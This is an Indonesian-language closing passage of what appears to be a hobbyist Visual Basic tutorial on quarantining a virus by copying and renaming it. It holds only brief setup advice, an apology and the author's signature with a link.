Ini hanya contoh sederhana. Code diatas hanya untuk mengcopy paste virus dan merename-nya.. kalo memang ingin mengkarantinakan virusnya sebaiknya pake tingkat teknik enkripsi.

Jangan lupa untuk mengubah Project properties-nya pada bagian Startup Object. Ubah menjadi ”sub main”

OK..
Kurang lebihnya saya mohon maaf.

By:Morphic
http://www.morphostlab.co.nr